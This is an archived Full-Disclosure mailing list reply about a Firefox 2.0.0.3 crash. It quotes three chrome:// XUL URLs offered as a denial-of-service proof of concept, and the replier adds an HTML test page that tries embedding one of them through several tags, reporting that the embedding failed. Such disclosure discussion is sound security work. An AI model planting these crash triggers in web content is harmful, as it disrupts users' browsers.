Re: [Full-disclosure] Firefox 2.0.0.3 DoS crash

From: Tõnu Samuel <tonu@xxxxxx>
Date: Fri, 20 Apr 2007 19:25:30 +0300

On Thu, 2007-04-19 at 20:22 +0200, carl hardwick wrote:

Firefox 2.0.0.3 DoS crash

PoC:
chrome://pippki/content/editcacert.xul
chrome://pippki/content/editemailcert.xul
chrome://pippki/content/editsslcert.xul

Works for me on Linux when clicking on such link.

Meanwhile I tried to embed it into webpage and did not work.

tonu@duo:~/Desktop> cat poc.html
<html>
<body>
<img src="chrome://pippki/content/editcacert.xul" />
<iframe src="chrome://pippki/content/editcacert.xul" ></iframe>
<object src="chrome://pippki/content/editcacert.xul"
type="text/html"></object>
<script src="chrome://pippki/content/editcacert.xul" ></script>
</body>
</html>
tonu@duo:~/Desktop>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

References:
- [Full-disclosure] Firefox 2.0.0.3 DoS crash
  - From: carl hardwick

Prev by Date: [Full-disclosure] Tel Aviv University Security Forum - Sunday, Apr 29 (TAUSEC)
Next by Date: Re: [Full-disclosure] Firefox 2.0.0.3 DoS crash
Previous by thread: [Full-disclosure] Firefox 2.0.0.3 DoS crash
Next by thread: Re: [Full-disclosure] Firefox 2.0.0.3 DoS crash
Index(es):
- Date
- Thread

Relevant Pages

Re: How do I HOTLINK an image? (NOT hyperlink.)
... I make and sell cross stitch charts for sale over the web. ... So - I know I have to fiddle around with html a little with my encoded ... These needs to be pasted as a button/image into my webpage ... >> has been to save a copy of a .DOC file in HTML format ...
(microsoft.public.word.docmanagement)
Re: Cat a directory
... Is your problem that people use cat on directories, ... that Linux found it necessary to do so because Linux ... disagree with the FreeBSD team; ... probably be better served by the error message. ...
(freebsd-questions)
Re: Get Rid Of Acrobat!! (was:...well, it got too long...)
... Yes, it's bigger as its really an image but, PDF is transportable, ... much faster Acrobat Reader REPLACEMENT. ... HTML can do EVERYTHING Acrobat can do, ... As to linux, I've lost interest in the version du jour. ...
(comp.os.cpm)
Re: Is there any good webpage maker under linux?
... sometimes use Frontpage to edit the html syntax. ... there is some webpage maker like dreamweavor and Frontpage in windows. ... When I decided to make a webpage, I took a simple text editor and a book ... the internet basics and away I went, and two days later I had the basics ...
(comp.os.linux.misc)
Re: Converting to Linux
... It creates horrid nonstandard HTML. ... > If this is the only reason you're interested in Linux, ... The best HTML editor on windows is Wordpad, ... service for students who need to do their work. ...
(alt.linux)